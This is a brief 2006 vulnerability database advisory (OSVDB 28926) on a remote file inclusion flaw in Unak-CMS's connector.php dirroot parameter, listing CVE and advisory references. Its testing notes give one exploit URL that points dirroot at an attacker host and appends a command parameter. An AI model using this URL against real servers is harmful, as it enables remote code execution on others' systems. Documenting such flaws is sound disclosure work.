Unak-CMS connector.php dirroot Variable Remote File Inclusion

2006-09-16T15:18:54
ID: OSVDB:28926
Type: osvdb
Reporter: OSVDB
Modified: 2006-09-16T15:18:54

Description

Manual Testing Notes

http://[target]/[Script Path]/fckeditor/editor/filemanager/browser/default/connectors/php/connector.php?dirroot=http://[attacker]?&cmd=id

References:

Vendor URL: http://www.unak.net/
Secunia Advisory ID: 21957
Related OSVDB ID: 28927
Generic Exploit URL: http://milw0rm.com/exploits/2380
FrSIRT Advisory: ADV-2006-3657
CVE-2006-4890
Bugtraq ID: 20070